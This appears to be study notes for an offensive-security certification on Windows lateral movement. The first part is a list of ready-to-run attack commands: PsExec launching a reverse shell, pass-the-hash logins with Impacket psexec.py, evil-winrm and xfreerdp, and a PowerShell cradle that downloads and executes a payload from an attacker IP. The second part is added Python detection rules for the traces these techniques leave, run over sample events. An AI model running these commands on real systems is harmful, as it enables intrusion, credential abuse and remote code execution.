OSEP Notes

Remote Access

PsExec64

  • Local SYSTEM

paexec.exe -s -i cmd
  • Remote Login

.\PsExec64.exe -accepteula \\file01.domain.COM C:\reverse-shell.exe

psexec

python3 impacket/examples/psexec.py -hashes :052e763020c5da81d4085a05e69b0f1b [RED/]pete@192.168.y.z

python3 impacket/examples/psexec.py -k -no-pass da@reddc.red.com cmd

WinRM

evil-winrm -i 172.16.y.z -u [red.com\\]jim -p Passw0rd

evil-winrm -i 192.168.y.z -u kevin -H [hash]

invoke-command -computername redwebaw.red.com -scriptblock {cmd /c "powershell -exec bypass -nop iex (new-object net.webclient).downloadstring('http://192.168.x.y/runner64.txt')"}

RDP

  • Password Authentication

xfreerdp /u:Administrator /p:lab [/d:red.com] /cert:ignore /v:192.168.y.z /dynamic-resolution
  • PTH

New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name DisableRestrictedAdmin -Value 0

xfreerdp /v:192.168.y.z /u:bill /pth:[hash] /d:red.com /dynamic-resolution
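Defender-side counterpart to the commands above, added here as an example and not part of the original notes: detection rules for the artefacts these techniques leave on the target, run over constructed sample events. Event IDs (System 7045, Security 4624, Sysmon 13) and field names are the real ones; host names, IP addresses and the KNOWN_HOSTS inventory are constructed.

```python
KNOWN_HOSTS = {"192.168.1.10", "192.168.1.11"}  # constructed inventory of domain-joined hosts

# Constructed sample events (not real telemetry): Windows event records with EventData
# flattened, the shape a SIEM export typically delivers.
EVENTS = [
    {"EventID": 7045, "Computer": "file01", "ServiceName": "PSEXESVC",
     "ImagePath": r"%SystemRoot%\PSEXESVC.exe"},
    {"EventID": 4624, "Computer": "file01", "LogonType": 3, "AuthenticationPackageName": "NTLM",
     "TargetUserName": "pete", "IpAddress": "192.168.45.200", "RestrictedAdminMode": "-"},
    {"EventID": 4624, "Computer": "ws02", "LogonType": 10, "AuthenticationPackageName": "NTLM",
     "TargetUserName": "bill", "IpAddress": "192.168.45.200", "RestrictedAdminMode": "Yes"},
    {"EventID": 13, "Computer": "ws02", "Details": "DWORD (0x00000000)",  # Sysmon RegistryEvent
     "TargetObject": r"HKLM\System\CurrentControlSet\Control\Lsa\DisableRestrictedAdmin"},
    {"EventID": 4624, "Computer": "ws02", "LogonType": 2, "AuthenticationPackageName": "Kerberos",
     "TargetUserName": "jim", "IpAddress": "-", "RestrictedAdminMode": "-"},  # benign console logon
]


def psexec_service(ev):
    """System 7045: PsExec installs PSEXESVC by default and PAExec a PAExec-<pid>-<host>
    service; -r renames the service, so the image path is checked as well."""
    if ev.get("EventID") != 7045:
        return None
    name, path = ev.get("ServiceName", ""), ev.get("ImagePath", "")
    if "PSEXESVC" in (name + path).upper() or name.upper().startswith("PAEXEC"):
        return f"PsExec/PAExec service installed on {ev['Computer']}: {name}"
    return None


def hash_based_logon(ev):
    """Security 4624: NTLM type 3 from a source outside inventory (psexec.py -hashes,
    evil-winrm -H) or RestrictedAdminMode=Yes (RDP session opened with xfreerdp /pth)."""
    if ev.get("EventID") != 4624:
        return None
    if ev.get("RestrictedAdminMode") == "Yes":
        return f"Restricted Admin RDP logon as {ev['TargetUserName']} on {ev['Computer']}"
    if ev.get("LogonType") == 3 and ev.get("AuthenticationPackageName") == "NTLM" \
            and ev.get("IpAddress") not in KNOWN_HOSTS:
        return f"NTLM network logon as {ev['TargetUserName']} on {ev['Computer']} from {ev['IpAddress']}"
    return None


def restricted_admin_enabled(ev):
    """Sysmon 13 writing 0 to the DisableRestrictedAdmin value under Lsa: the change the
    New-ItemProperty command above makes, and the precondition for PtH over RDP."""
    if ev.get("EventID") != 13 or not ev.get("TargetObject", "").endswith("DisableRestrictedAdmin"):
        return None
    return f"Restricted Admin enabled on {ev['Computer']}" if "0x00000000" in ev.get("Details", "") else None


RULES = [psexec_service, hash_based_logon, restricted_admin_enabled]

def detect(events):
    """Run every rule over every event and return (rule name, message) pairs."""
    return [(r.__name__, hit) for ev in events for r in RULES if (hit := r(ev))]
```

Sysmon only emits event 13 for that value if its configuration includes a RegistryEvent rule covering the Lsa key, and a service renamed with -r and copied under another file name evades the 7045 name match.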